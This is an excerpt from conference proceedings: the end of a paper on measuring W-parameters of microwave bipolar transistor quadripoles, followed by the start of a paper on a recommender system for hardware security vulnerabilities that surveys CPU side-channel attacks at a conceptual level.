characteristics is to obtain more reliable information about the device by improving the methods and means of measurement [28]. The use of the analysis results based on the developed algorithm allows us to develop a new, more advanced installation for measuring the standard W-parameters of quadripole semiconductor devices, taking into account their potential instability [22, 23, 29]. The measuring device for determining the characteristics of potentially unstable semiconductor devices should provide [30]: 1) taking multidimensional measurements (in all schemes of inclusion of the investigated quadrupole) with minimal losses in the measuring channel and decoupling of microwave circuits power supply; 2) the stability of the measuring device during the measurement; 3) connection to the measuring channel of
Standard and Nonstandard W-parameters
607
Fig. 8. Frequency dependences of the nonstandard quadripole transistor W-parameters Im(Y12 Y21 ): are theoretical data and are experimental data.
Fig. 9. Frequency dependences of the nonstandard quadripole transistor W-parameters |Y12 Y21 |: are theoretical data and are experimental data.
three- and four-pin devices, as the most common in microwave electronics; 4) conducting measurements in the required frequency range; 5) measurement of parameters with high accuracy and productivity for the possibility of applying the installation in laboratory conditions. The system of Y-parameters of conductivity matrix of active quadrupole is selected in the work as the most convenient and widely used for the calculation of electronic circuits described by the matrix of the equivalent quadrupole. We combine the graphical representation of immittance with its analytical expressions, and on this basis, develop the method for determining the standard W-parameters of the quadrupole. To do it we use the method of conformal mappings of the function of a complex variable [27, 28]. Let represent the expression for the input and output
608
A. Semenov et al.
immittances of the quadripole in the generalized W-parameters (Fig. 10) Winput = W11 −
W12 W21 W12 W21 , Woutput = W22 − , W22 − Wload W22 − Wg
(8)
where W11 , W22 , W12 , W21 - generalized parameters of the quadrupole matrix; Winput , Woutput are input and output immittances of the quadripole; Wload , Wg are load of immittances and generator (Fig. 10). Let convert the expressions for the input and output immittances (8) to the form:
(9)
where a = W22, b = W22 W11 − W12 W21 , c = W11 .
Fig. 10. Active quadripole with connected loads.
In accordance with the theory of conformal mappings [27, 28], straight line Re Wg (Wload ) = 0 is displayed on the plane Woutput (Winput ) by the circles Woutput − Woutput0 = ρoutput Winput − Winput0 = ρinput , and with the centers Woutput0 and Winput0 , and the radiuses ρoutput and ρinput . In this case Wouyput0 = W22 − ρoutput =
W12 W21 W12 W21 , Winput0 = W11 − , 2 Re W11 2 Re W22
(10)
|W12 W21 | |W12 W21 | , ρinput = . 2 Re W11 2 Re W22
(11)
As follows from (10) and (11), Woutput (Winput) can be considered as a fractionallinear function, which displays the complex plane Wg on the plane Woutput and the complex plane Wload on the plane Winput. The probable value of load immittance Wg corresponds to the half-plane ReWg ≥ 0, and the value of the load Wload corresponds to the half-plane ReWload ≥ 0 (Fig. 11).
Standard and Nonstandard W-parameters
609
ImWg(Wload)
0
ReWg(Wload)
Fig. 11. Half-plane of the immittance Wg (Wload ) = ReWg (Wload ) + jImWg (Wload ).
Fig. 12. Conformal mapping of immittances Wg (Wload ).
At ReWg > 0 the whole left half-part Wg is displayed inside the circle on the plane Woutput , and if ReWload > 0 the whole right half-plane Wload is displayed inside the circle on the plane Winput (Fig. 12). Dependences of the quadripole input immittance Winput (output Woutput ) on the reactive component of the immittance of the load Wload (generator Wg ) are given on the Fig. 13. In Fig. 13 circle with radius pinput represents the geometric place of points of the input immittance values at an active component of load ReWload > 0 equal to Wload . For this graphical interpretation of input and output immittances we can write the system of
610
A. Semenov et al.
Fig. 13. Dependence of the quadripole input immittance Winput (output Woutput ) on the reactive component of the immittance of the load Wload (generator Wg ).
analytic expressions:
⎧ |W12 W21 | ⎪ ⎪ ρinput = , ⎪ ⎪ 2 Re W22 ⎪ ⎪ ⎪ ⎪ ⎪ |W12 W21 | ⎪ ⎪ , ρinput = ⎪ ⎪ 2 Re(W ⎪ 22 + Wload ) ⎪ ⎪ ⎪ |W12 W21 | ⎪ ⎪ ⎪ ρoutput = , ⎪ ⎪ 2 Re W11 ⎪ ⎪ ⎨ Re(W12 W21 ) , Re Winput0 = Re W11 − ⎪ 2 Re W22 ⎪ ⎪ ⎪ ⎪ Im(W12 W21 ) ⎪ ⎪ , ⎪ Im Winput0 = Im W11 − ⎪ ⎪ 2 Re W22 ⎪ ⎪ ⎪ ⎪ Re(W12 W21 ) ⎪ ⎪ , Re Woutput0 = Re W22 − ⎪ ⎪ ⎪ 2 Re W11 ⎪ ⎪ ⎪ ⎪ Im(W12 W21 ) ⎪ ⎩ Im Woutput0 = Im W22 − , 2 Re W11
(12)
where ReWload is the active component of the load immittance; W11 , W12 , W21 , W22 the required parameters of matrices of the equivalent quadrupole. Having solved the system (12), we find the parameters W11 and W22 , which are the geometric representation of intersection points of the immittance circles on the input
Standard and Nonstandard W-parameters
611
(with different values of ReWload ) and on the output (with different values of ReWg ):
(13)
ρinput Re W22 , ρoutput 2 = Im Winput0 + ρinput − Re2 W11 − Winput0 .
ReW11 = Im W11
(14)
Considering the solution of system (12), we can conclude that in order to determine the W11 and W22 parameters of the equivalent quadrupole, it is sufficient to determine the parameters Winput0 , Woutput0 , ρinput , ρoutput and ρinput of the immittance circle [23, 29].
5 Experimental Research of of Standard Microwave W-parameters of Active Quadripole based on the Bipolar Transistor The measuring complex, which implements the method for determining the Y parameters (Y11 , Y12 , Y21 , Y22 ), has a structural scheme shown on Fig. 14. Unconventional elements of the measuring installation include the adjustable immittance Y (or impedance Z). With conductivity ReY = 0, the regulated short-circuit piston is used as conductivity Y, when the conductivity Y is changed (ReY > 0), the known active conductivity ReY = ReYload is connected parallel to the piston input. Adjustable complex resistance Z is realized in the form of a device [31] consisting of a bipolar transistor, which emitter is connected to the first terminal of bias source, and collector is connected to the second terminal of the bias source, and with a resistance, which is connected between the second terminal of the bias source and strapping filter, which is connected to the base of transistor (Fig. 15). This impedance device imitates regulated active and reactive impedances, due to the inclusion of a strip-locking filter, provides a negative value of the impedance active component, which achieves the expansion of the device frequency range [31]. Adjustable integrated resistance Z, implemented as an impedance device (Fig. 15), is required to create the operating modes of the quadripole in which the power transmission in the forward or reverse direction is absent. The measuring process of the quadrupole complete conductivity matrix Y consists of two steps, at first, own parameters (y11 and y22 ) are measured, and then the mutual parameters (y12 and y21 ) are measured. At the first stage, the immittance meter (MFC), through the switch K4 , is connected to the investigated quadripole Y. Through the switch K2 , the generator of electromagnetic oscillations G, which forms the signal of required frequency, is connected to the output of the investigated quadripole Y, adjustable integrated resistance Z is set to zero. With a real component of conductivity ReYload
612
A. Semenov et al.
MFC
G Y K1
K3 PSU ||Y||
K4 K2
Z В Fig. 14. The block diagram of measuring complex of the Y-parameters of the conductivity matrix of the microwave quadrupole with consideration of their potential instability: immittance meter (MFC); the holder of the investigated quadripole (Y), which provides its connection to the measuring channel and decoupling of microwave circuits power supply; generator of electromagnetic oscillations (G); four switches (K1 , K2 , K3 , K4 ); adjustable immittance (Y) (or impedance (Z)) required for obtaining different operating modes of the investigated quadrupole; power supply unit (PSU), which specifies the required operating mode of direct current; power meter (PM) [31]. The complex transmission coefficients measuring device P4–11 is used, which allows measuring the quadripole parameters at frequencies 0.001… 1.25 GHz. For higher frequencies it is necessary to use another types of meters. Power meter is a device of type M4–2. Switches K1… K4 are used for connection of measuring devices and adjustable immittance to the input and output of the investigated quadripole. To automatically determine the readings of used pointer measuring devices, the method considered in [32] was used.
= 0, the geometric location of the points of the input conductivity Yinput will be the boundary circle on the complex plane of dependence Yinput on the reactive component of the conductivity ImYload (Fig. 5). Given that on the immittance circles of the geometric point of the points of the input and output conductivity of the quadrupole there are always such points that are in the right half-plane of the complex plane, exclusion of the excitation of the investigated active quadripole in the measurement process can be achieved. By changing the length of the short-circuit piston (ReYload = 0), we achieve
Standard and Nonstandard W-parameters
613
Fig. 15. Principle scheme of impedance device simulating reactive and active impedances: 1 transistor; 2 - source of bias voltage; 3 - resistance; 4 - strip lock filter.
stable immittance meter (MFC) readings and measure the three values of the input conductivity of the quadripole Yinput1 , Y input2 and Y input3 , which values lie in the right half-plane of the complex plane. ReYinput0 =
2 2 2 2 2 ReYinput2 − ReYinput1 + ImYinput2 − ImYinput1 − 2ImYinput0 (ImYinput2 − ImYinput1 )
Im Yinput0 = →
2(ReYinput2 − ReYinput1 ) 2 2 2 2 (Re Yinput2 − Re Yinput1 + Im Yinput2 − Im Yinput1 )(Re Yinput2 − Re Yinput3 )− →
2[(Im Yinput3 − Im Yinput2 )(Reinput2 − Re Yinput1 )− →
2 2 2 2 − Re Yinput3 + Im Yinput2 − Im Yinput3 )(Re Yinput2 − Re Yinput3 ) → −(Re Yinput2
→ −(Im Yinput1 − Im Yinput2 )(ReYinput2 − Re Yinput3 )]
ρinput =
,
(ReYinput1 − ReYinput0 )2 + (ImYinput1 − ImYinput0 )2 .
,
(15)
→
(16) (17)
Next, we need to find the radius of any immittance circle ρinput at the value of active component of the load conductivity ReY = ReYload > 0. To do it, the piston input of the regulated complex load Y is parallel connected to the known active conductivity ReY = ReYload . Repeating the measurement of three input values of the conductivity Yinput1 , Yinput2 , and Yinput3 by setting the value of ReYload , define ρinput : = ρinput
(Re Yinput1 − Re Yinput0 )2 + (Im Yinput1 − Im Yinput0 )2 .
(18)
The next step is to find the immittance parameters of the active quadripole on the output. To do it, using the switch K3 on the input of the quadripole holder, an adjustable complex conductivity Y is connected, while the short-circuit piston removes the parallel connected active load ReYload , ReY = 0. The conductivity of the short-circuit piston will only have a reactive component. To the output of the investigated quadripole through the switch K2 the immittance meter (MFC) is connected. Using switch K1 , the generator G is connected to the input of the investigated quadripole Y. By changing the length of the short-circuit piston of the regulated complex conductivity Y, changing the imaginary component of the conductivity ImY, we obtain a stable indication of the immittance meter, which guarantees the stability of the measuring device. Then measure three values
614
A. Semenov et al.
of the output conductivity of the active quadripole Youtput1 , Youtput2 and Youtput3 , for which, by the above method, we determine the output parameters of the immittance circle of the investigated active quadripole (Fig. 13): Im Youtput0 = →
2 2 2 2 2 − Re Youtput1 + Im Youtput − Im Youtput1 )(Re Youtput2 − Re Youtput1 )− → (Re Youtput2
2[(Im Youtput3 − Im Youtput2 )(Re Youtput2 − Re Youtput1 )− →
2 2 2 2 2 → −(Re Youtput2 − Re Youtput3 + Im Youtput2 − ImYoutput3 )(Re Youtput2 − Re Youtput3 )
→ −(Im Youtput1 − Im Youtput2 )(Re Youtput2 − Re Youtput3 )]
→
(19)
,
Re Youtput0 =
2 2 2 2 Re Youtput2 − Re Youtput1 + Im Youtput2 − Im Youtput1 − 2 Im Youtput0 (Im Youtput2 − Im Youtput1 )
2(Re Youtput2 − Re Youtput1 )
ρoutput =
,
(Re Youtput1 − Re Youtput0 )2 + (Im Youtput1 − Im Youtput0 )2 .
(20) (21)
As a result of the measurements and calculations, we obtained the parameters of two immittance circles at the input of the investigated active quadripole ImYinput0 , ReYinput0 , ρinput , and ρinput , and the immittance circle at the output of ReYoutput0 , ImYoutput0 and ρoutput . We also set the active part of the load of ReYload . The obtained results are sufficient for finding parameters Y11 and Y22 :
Im Y22
Re Yload ρinput
, (ρinput − ρinput ) 2 ρinput − Re2 (Y11 − Yinput0 )·ρoutput = Im Youtput0 + , ρinput
Re Y22 =
(22) (23)
In the second stage, we determine the mutual parameters Y12 and Y21 [30]. To determine these parameters we need to determine the input and output conductivity of the investigated quadripole with the complex regulated resistance [31] connected to its common bus, selected in such a way that there is no power transmission in the formed quadripole (Y12 = 0 and Y21 = 0). In addition, it is necessary to determine the maximum power transmission coefficient Kms . Measurements are performed in the following way. At the entrance to the quadripole Y the signal from the generator G (Fig. 14) is fed. To the quadripole output the power meter is connected through the switch K2 , switches K3 and K4 are in the open position, resistance Z is in the zero position. The power P1 at the quadripole output is measured, the switches K1 and K2 changes the places of generator G and the power meter PM, we measure the power at the input of the investigated quadrupole P2 . According to the known formula [33], we find the maximum power transmission coefficient P1 KmS = . (24) P2 Then we change the measuring device to its starting position and by changing the value of the complex resistance Z to a certain value, we obtain a zero indication of the
Standard and Nonstandard W-parameters
615
power meter, which indicates the fulfillment of the condition Y21 = 0. In this mode, instead of a power meter, we connect the immittance meter (MFC) trough the switch K2 and measure the output conductivity of the formed quadripole Yinput . Then we connect the generator G through the switch K2 to the output of the quadripole Y, the input of which connect through the switch K1 to the power meter PM. Changing the value of the complex resistance Z, we obtain zero readings of the power meter PM, which indicates the fulfillment of the condition Y21 = 0. Instead of the power meter, through the switch K1 , we connect to the quadripole input the immittance meter (MFC) and in the steady state of the zero power transmission perform the measurement of the input conductivity Yin . On the base of obtained results we calculate Y12 and Y21 [23, 31]: Y12 =
Youtput Y11 − Yinput Y22 Youtput Y11 − Yinput Y22 , Y21 = , Yinput KmS − Youtput Yinput − Youtput /KmS
(26)
where KmS - maximum power transfer coefficient; Y11 i Y22 - parameters of the matrix of conductivity of the investigated quadripole; Yinput i Youtput - input and output conductivity of the formed quadripole (through the complex resistance Z) in the mode of zero transfer power. Summing up, we can resume that in the process of measuring there is no need to make short-circuit input and output terminals of the quadripole (in particular, the transistor), which ensures the stability of the measuring installation in a wide range of frequencies. In contrast to the measurement of the scattering matrix S-parameters, there is no need to make phase measurements of a signal passing through a quadripole [34], which simplifies the measurement process and reduces the error resulting from the inconsistency of the input and output conductivities with the conductivity of the measuring channel [35–37].
6 Conclusion The paper considers the developed methodology for determining standard and nonstandard W-parameters of potentially unstable quadripoles. Using this methodology, the mathematical model of the W-parameters of bipolar transistors has been developed. In particular: – the choice of equivalent circuits of bipolar transistors in the microwave range is substantiated; – expressions that establish the relationship between the physical parameters of the equivalent circuit of the bipolar transistor and the W-parameters of the bipolar transistor as a potentially unstable quadripole; – the method of numerical experiment of W-parameters determination is developed; – numerical calculation of nonstandard Y-parameters of bipolar transistors and comparative analysis of theoretical and experimental studies have been performed, which shows the adequacy of the developed methodology (the difference does not exceed 10%); The new method of the W-parameters measuring of the quadripole is suitable for both low and ultrahigh frequencies. The standard W-parameters characterizing the instrument under investigation as equivalent to the quadripole can not be determined in
616
A. Semenov et al.
the microwave range by direct measurements. Therefore, mathematical expressions are obtained, which establish the relationship between them and active quadripole parameters. For implementation of the method, a new measuring complex was developed, in which, in addition to standard components, non-standard elements were included that allow to simulate active and reactive impedances. In the work the equations for determining the methodological error of this method, which does not exceed 5%, are proposed.
References 1. Di Paolo Emilio, M.: Bipolar transistor. In: Microelectronics, pp. 19–34. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-22545-6_2 2. Makarov, N.S., Ludwig, R., Bitar, S.J.: Bipolar junction transistor and BJT circuits. In: Practical Electrical Engineering, pp. 851–918. Springer, Cham (2016). https://doi.org/10.1007/ 978-3-319-21173-2_17 3. Grebennikov, A., Kumar, N., Yarman, B.S.: Broadband RF and Microwave Amplifiers. CRC Press, Boca Raton (2017). https://doi.org/10.1201/b19053 4. Grebennikov, A., Sokal, N.O., Franco, M.J.: Computer-aided design of switchmode power amplifiers. In: Switchmode RF and Microwave Power Amplifiers, pp. 607–668 (2012). https:// doi.org/10.1016/b978-0-12-415907-5.00012-2 5. Pridham, G.J.: Solid-State Circuits. In: Hiller, N. (ed.) The Commonwealth and international library. Electrical engineering division, Pergamon, Elsevier (2013) 6. Eroglu, A.: Linear and Switch-Mode RF Power Amplifiers. CRC Press, Boca Raton (2017). https://doi.org/10.1201/9781315151960 7. Grebennikov, A.: RF and Microwave Transmitter Design. CRC Press, Boca Raton (2011). https://doi.org/10.1002/9780470929308 8. Grebennikov, A.: RF and Microwave Power Amplifier Design. McGraw-Hill, New York (2015) 9. Reisch, M.: Physics and modeling of heterojunction bipolar transistors. In: High-Frequency Bipolar Transistors. Springer Series in Advanced Microelectronics, vol 11, pp. 395–410. Springer, Berlin, Heidelberg (2003). https://doi.org/10.1007/978-3-642-55900-6_4 10. Papadopoulos, C.: Solid-State Electronic Devices. In: Undergraduate Lecture Notes in Physics. Springer, New York (2014). https://doi.org/10.1007/978-1-4614-8836-1 11. Rieger, M., Hieber, W.: Transistor modeling based on small signal S- and Y-parameters. In: Groll, H., Waidelich, W. (eds.) Microwave Applications, pp. 59–64. Springer, Berlin, Heidelberg (1987). https://doi.org/10.1007/978-3-642-83157-7_6 12. Pridham, G.J.: Electronic devices and circuits. In: The Commonwealth and International Library: Electrical Engineering Division, vol. 3. Elsevier (1972). https://doi.org/10.1016/ c2013-0-02454-1 13. Grebennikov, A.: RF and Microwave Transistor Oscillator Design. John Wiley & Sons, New York (2007). https://doi.org/10.1002/9780470512098 14. Pritchard, R.L.: Transistor equivalent circuits. Proc. IEEE 86(1), 150–162 (1998). https://doi. org/10.1109/5.658766 15. Filinyuk, N.A.: Use of the stray reactances of transistor leads and case for the construction of resonance microwave switches. Radio Eng. Electron. Phys. 21(5), 160–162 (1976) 16. Filinyuk, N.A., Gavrilov, D.V.: Parameters determination of physical equivalent circuit of Schottky dual-gate MESFET. Izvestiya Vysshikh Uchebnykh Zavedenij. RadioelektronikaVolume 47(11), 71–75 (2004)
Standard and Nonstandard W-parameters
617
17. Rieh, J.-S., et al.: X- and Ku-band amplifiers based on Si/SiGe HBT’s and micromachined lumped components. IEEE Trans. Microw. Theory Tech. 46(5), 685–694 (1998). https://doi. org/10.1109/22.668683 18. Balashkov, M.V., Bogachev, V.M., Solomatin, D.A.: Simplification of transistor models for the design of information-communication systems. In: 2017 Systems of Signal Synchronization, Generating and Processing in Telecommunications (SINKHROINFO), 2017, Kazan, Russia, pp 1–4 (2017). https://doi.org/10.1109/SINKHROINFO.2017.7997499 19. Bogachev, V.M., Volkov, V.M., Lysenko, V.G., Musyankov, M.I.: Calculating the parameters of high-power high-frequency transistors. Radio Eng. Electron. Phys. 20(3), 97–105 (1975) 20. Haase, M., Hoffmann, K., Hudec, P.: General method for characterization of power-line EMI/RFI filters based on S-parameter evaluation. IEEE Trans. Electromagn. Compat. 58(5), 1465–1474 (2016). https://doi.org/10.1109/TEMC.2016.2583221 21. Bogachev, V.M., Smol’skii, S.M.: The stability of oscillations and transients in high-frequency transistor oscillators having inertial self-bias. Radiophys. Quantum Electron. 17(2), 172–179 (1974). https://doi.org/10.1007/BF01037406 22. Semenov, A.O., Voznyak, O.M., Osadchuk, O.V., et al.: Development of a non-standard system of microwave quadripoles parameters. Proc. SPIE 11176, 111765N (2019). https:// doi.org/10.1117/12.2536704 23. Semenov, A.A., Voznyak, O.M., Vydmysh, A.A., et al.: Differential method for measuring the maximum achievable transmission coefficient of active microwave quadripole. J. Phys. Conf. Ser. 1210, 012125 (2019). https://doi.org/10.1088/1742-6596/1210/1/012125 24. Semenov, A.: Mathematical model of the microelectronic oscillator based on the BJTMOSFET structure with negative differential resistance. In: 2017 IEEE 37th International Conference on Electronics and Nanotechnology (ELNANO), 2017, Kiev, pp 146–151 (2017). https://doi.org/10.1109/ELNANO.2017.7939736 25. Semenov, A., Baraban, S., Semenova, O., et al.: Statistical express control of the peak values of the differential-thermal analysis of solid materials. Solid State Phenom. 291, 28–41 (2019). https://doi.org/10.4028/www.scientific.net/ssp.291.28 26. Evseev, V.I., Lupanova, E.A., Nikulin, S.M., Petrov, V.V.: Contact device with tunable strip matching circuits for measuring parameters of microwave transistors. In: 2019 PhotonIcs & Electromagnetics Research Symposium - Spring (PIERS-Spring), 2019, Rome, Italy, pp. 2752–2755 (2019). https://doi.org/10.1109/PIERS-Spring46901.2019.9017801 27. Smith, P.H.: Electronic Applications of the Smith Chart. SciTech Publishing (1995). https:// doi.org/10.1049/sbew003e 28. Wilson, C., Zhu, A., Cai, J., King, J.B.: Pade-approximation based behavioral modeling for RF power amplifier design. IEEE Access 9, 18904–18914 (2021). https://doi.org/10.1109/ ACCESS.2021.3052687 29. Qin, M., Sun, Y., Li, X., Shi, Y.: Analytical parameter extraction for small-signal equivalent circuit of 3D FinFET into sub-THz range. IEEE Access 6, 19752–19761 (2018). https://doi. org/10.1109/ACCESS.2018.2822672 30. Chen, F.-J., Cheng, X., Zhang, L., et al.: Synthesis and design of lumped-element filters in GaAs technology based on frequency- dependent coupling matrices. IEEE Trans. Microw. Theory Tech. 67(4), 1483–1495 (2019). https://doi.org/10.1109/TMTT.2019.2898857 31. Filinyuk, M.A., Wozniak, O.M., Kurzanov, Y.I.: Ogorodnik OV (1997) Impedance device. Ukraine Patent 18, 059 (1997) 32. Kucheruk, V., Kurytnik, I., Kulakov, P.: Definition of dynamic characteristics of pointer measuring devices on the basis of automatic indications determination. Arch. Control Sci. 28(3), 401–418 (2018). https://doi.org/10.24425/acs.2018.124709 33. Bilbro, G.L., Steer, M.B., Trew, R.J., et al.: Extraction of the parameters of equivalent circuits of microwave transistors using tree annealing. IEEE Trans. Microw. Theory Tech. 38(11), 1711–1718 (1990). https://doi.org/10.1109/22.60019
618
A. Semenov et al.
34. Xia, C.: Modeling and simulation analysis of RF passive devices based on microscope technology and new microwave circuits based on adjustable devices. Acta Microsc. 28(2), 271–280 (2019) 35. Semenov, A.O., Baraban, S.V., Osadchuk, O.V., Semenova, O.O., Koval, K.O., Savytskyi, A.Y.: Microelectronic pyroelectric measuring transducers. In: Tiginyanu, I., Sontea, V., Railean, S. (eds.) ICNBME 2019. IP, vol. 77, pp. 393–397. Springer, Cham (2020). https:// doi.org/10.1007/978-3-030-31866-6_72 36. Semenov, A., Osadchuk, O., Semenova, O., Koval, K., Baraban, S., Savytskyi, A.: A deterministic chaos ring oscillator based on a MOS transistor structure with negative differential resistance. In: 2019 IEEE International Scientific-Practical Conference Problems of Infocommunications, Science and Technology (PIC S&T), 2019, Kyiv, Ukraine, pp. 709–714 (2019). https://doi.org/10.1109/PICST47496.2019.9061330 37. Semenov, A.O., Savytskyi, A.Y., Bisikalo, O.V., Kulakov, P.I.: Mathematical modeling of the two-stage chaotic colpitis oscillator. In: 2018 14th International Conference on Advanced Trends in Radioelecrtronics, Telecommunications and Computer Engineering (TCSET), 2018, Lviv-Slavske, Ukraine, pp. 835–839 (2018). https://doi.org/10.1109/TCSET.2018.833 6327
Developing Security Recommender System Using Content-Based Filtering Mechanisms Maksim Iavich1 , Giorgi Iashvili1(B) , Roman Odarchenko2 , Sergiy Gnatyuk2 , and Avtandil Gagnidze3 1 Caucasus University, Paata Saakadze Str. 1, 0102 Tbilisi, Georgia
[email protected] 2 National Aviation University, Liubomyr Huzar Ave, 1, Kyiv 03058, Ukraine 3 East European University, Shatili Str. 4, 0178 Tbilisi, Georgia
Abstract. Machine learning and artificial intelligence are becoming more common today. They are used in a variety of areas, including the energy, medical, and financial sectors, to complete different tasks and assist in the making of key choices. Among other uses, machine learning and artificial intelligence are used to build powerful recommender engines to provide user with corresponding recommendations in different directions like movie recommendations, friends suggestions in social networks and much more. The goal of the scientific work offered by the authors of this research was to identify and understand the vulnerabilities of hardware-based systems and related mechanisms, in order to improve the corresponding security measures. The main goal of the offered research is to design an upgraded recognition system and to identify the corresponding hardware-based vulnerabilities. Based on the research the goal of the papers is also to provide the potential users with the corresponding recommendations. This article discusses a web-based system that studies the potential security issues in hardware-based systems and provides optimal solutions. The system was tested using real-world cases from industrial and corporate organizations, and the assessment process demonstrates its ability to greatly enhance cybersecurity levels for various types of organizations. The research has resulted in a prototype of a web-based system that collects information about modern hardware-related vulnerabilities and provides the users with appropriate recommendations based on a specific situation. Keywords: machine learning · content-based · vulnerability identification · web-based system
1 Introduction Machine learning and artificial intelligence are becoming more common today. They are used in different areas, including the energy, medical, and financial sectors, to complete different tasks and assist in the making of key choices. Among other uses, artificial intelligence and machine learning and needed to build powerful recommender engines to provide user with corresponding recommendations in different directions such movie recommendation, friends suggestions in social networks and much more. There are © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 619–634, 2023. https://doi.org/10.1007/978-3-031-35467-0_37
620
M. Iavich et al.
a variety of ways and mechanisms in computer science that make advantage of the machines’ central processing unit (CPU). This CPU’s architecture is also crucial in terms of cyber security process performance. As a result, today’s popular automation and encryption procedures rely on processor power to handle a variety of cyber security issues. Efficient cyber security mechanisms rely on proper algorithmic cores for their design and implementation. To create security algorithms that are both efficient and usable, various approaches are considered. One way to improve the efficiency and security of automation mechanisms is to allow the machine’s central processing unit to work simultaneously on relevant software components and some aspects of the system. To optimize cyber security mechanisms, efficient usage of the CPU must take into account several factors. This scientific paper encompasses a wide range of research areas, such as the physical construction of the central processing unit, efficient processing of data, and techniques for transmitting data when communicating with software components or end users. The paper is organized into multiple sections. The second section delves into security measures that are implemented at the central processing unit level. It examines modern attacks that target the central processing unit and discusses security mechanisms that are relevant to the Internet of Things. Moreover, the paper introduces a new recognition system for identifying hardware-based vulnerabilities and evaluates its practical performance. The final section outlines future plans for development and concludes the presented research.
2 Challenges of CPU Addressing computational speed is a crucial aspect of cyber security. The processor’s architecture plays a pivotal role in determining the data processing capabilities and, at times, the entire machine’s functionalities. Physical architectures of processors can result in limitations that cause incompatibilities with related systems, including security mechanisms. On the other hand, a well-designed central processing unit architecture enables the incorporation of new hardware into modern systems such as microarchitectures and power-saving central processing units, allowing existing software to run on newer platforms. Unfortunately, hardware-oriented attacks are on the rise, and many hardware-based systems are susceptible to physical and side-channel attacks. Side-channel attacks occur when message and key inputs are obtained, and even with standard cryptographic algorithms, cipher leakage can still occur due to hardware issues. Consequently, this study aims to analyze existing hardware-oriented attacks, calculate the data leakage caused by these attacks, and suggest techniques that can either mitigate or it can eliminate the leakage.
3 Literature Review Hardware-based attack vectors are becoming increasingly prevalent nowadays. Successful modern attacks using variuos hardware-based techniques are analyzed in [1–3]. Even software implementations of different security mechanisms, including cryptographic
Developing Security Recommender System
621
algorithms, are vulnerable to attacks like side-channel [4–7]. Modern security systems may also be vulnerable to the attacks on the hardware, which can use different approaches [8–10]. New methods of hardware attacks are continuously being developed, including approaches that combine hardware and software to get better results during attacks. To achieve this, various malicious hardware is also being developed [11, 12, 13]. Research in the field of improving existing mechanisms of security is ongoing, with authors offering new versions of the cryptosystems commonly used in practice [14–16]. However, a lot of work needs to be conducted to achieve a sufficient level of security from the hardware side. One crucial field of modern cybersecurity is the IoT world, where very often, a new vector of the attack against IoT devices is reported [17–19].
4 The Role of CPU in Security Many cryptographic modes of operation rely on the central processing unit’s computational power to ensure system security. One such example is the Galois/Counter Mode (GCM) algorithm, which is used in various protocols such as IPSec, MACsec, TLS 1.2, and SSH for secure network communication. GCM utilizes Intel Architecture Processors’ built-in AES-NI instructions. Intel engineers are constantly improving GCM through micro-architectural and critical-path optimizations to enhance the efficiency of security mechanisms and adapt to a broader range of real-world scenarios. Morpheus is another example of CPU usage in cybersecurity. The University of Michigan developed this new CPU architecture in 2019, which can block attacks by encrypting and randomly reshuffling key bits of its data and code twenty times per second. This processor architecture is faster than most automated hacking mechanisms and even faster than any human hacker. It can be used in various software and hardware platforms, including portable and IoT devices. Morpheus’s focus is on protecting against control-flow integrity attacks like buffer overflows. It randomizes the bits of data called undefined semantics, which are critical parts of the CPU architecture that deal with the format and content of programmed application code. While Morpheus cannot address all cybersecurity issues, it is suitable for developers and users interested in protecting against control-flow integrity attacks.
5 Attack Vectors on CPU Cyberattacks on computer systems and devices remain a significant problem despite the development of modern security mechanisms. Hackers continue to come up with creative and complicated methods to achieve their goals, which result in the creation of new attack vectors even for well-known organizations. DoS attacks and CPU side-channel attacks are two common types of attacks that target the central processing unit. DoS (Denial of Service) attacks disrupt the normal operation of the CPU by consuming a significant amount of processing resources, resulting in decreased performance or complete halt of the CPU. Attackers achieve this by keeping the processor’s resources, such as registers, functional units, and logical units, in an active state, or by exploiting architectural vulnerabilities in the CPU using specialized malware components. For instance, hackers may gain control of multiple devices,
622
M. Iavich et al.
including IoT devices, to create a botnet that launches a massive number of malicious requests at the victim, effectively causing a DoS attack. CPU side-channel attacks involve exploiting vulnerabilities in the physical implementation of cryptographic mechanisms to obtain sensitive information. These attacks leverage leaked information from the CPU’s physical behavior, such as timing information, electromagnetic leaks, or power consumption. For example, attackers can use the CPU cache as a side channel to extract data from the cache memory of the processor, allowing them to gain unauthorized access to critical data by extracting information from the memory of another active process in the system. A known vulnerability is the Rogue Data Cache Load exploit, which affects modern Intel processors and enables attackers to bypass security boundaries and read protected kernel memory from user processes. The Zombie-Load Attack targets recent Intel processor versions and exploits microarchitecture data sampling vulnerabilities. This allows attackers to intercept future system commands through speculative execution, thereby gaining access to sensitive information saved in the CPU. To mitigate the risk of such attacks, manufacturers release patches and updates to address vulnerabilities as they are discovered. However, as attackers continue to develop new methods and exploit new vulnerabilities, it is crucial to remain vigilant and keep systems and devices updated with the latest security mechanisms.
Fig. 1. The side-channel attack on practice
It must be mentioned that in a research that was published in 2019, adetailed description of the ZombieLoad Attack is offered. Thus, it is offered that the ZombieLoad is not a classical side-channel attack, but this attack can be categorized as data-sampling attack [2]. Nowadays side-channel attacks on the software of microcontroller are also used very often. Figure 1 explains how the process of the mentioned attack. The example explains the attack on the software implementation of Advanced Encryption Standard (AES). The goal of this attack is to get k* - a secret key of the encryption algorithm. The attacker can see the input value p and the microcontroller’s power consumption. The
Developing Security Recommender System
623
known encryption algorithm is used in the process. The one thing which is unknown is k* - secret key. The hacker can get z – the intermediate result, based on his input denoted as p. z is based on p and is a part of k*. By means of analyzing the side-channel leakage of z - an intermediate result, a hypothesis test can be performed on the values of secret key. The leakage, which was caused by the intermediate result, can be written as a function of k*: The goal of the attack is to receive a k* of the algorithm. The hacked can check the input and microcontroller’s power consumption. Encryption algorithm, which was used in the described process is known. The one thing which is unknown is secret key k*. An adversary has the ability to obtain the intermediate output z, given an input value p. z is based on p and the part k*. By means of analysis of the side-channel leakage of z, a hypothesis test on the value of the key k* can be implemented. We can be represent a leakage caused by an intermediate result, z as a function of k*: (1) L k ∗ = fk ∗ (p) + ε The function fk* is dependent on both the cryptographic algorithm and the hardware and software implementation methods. The error ε in the function is a random variable, representing measurement errors and unrelated activities during the implementation of the cryptographic algorithm [3]. As a result of this relationship, various side-channel attacks can be executed. • In Differential Power Analysis (DPA), an attacker must use a portion of the key and conduct a test on the difference for fk*(p) based on the value of the key segment that has been obtained. • In Correlation Power Analysis (CPA), an attacker can use linear correlation between fk and L(k*). During the attack, the attacker has the ability to extract 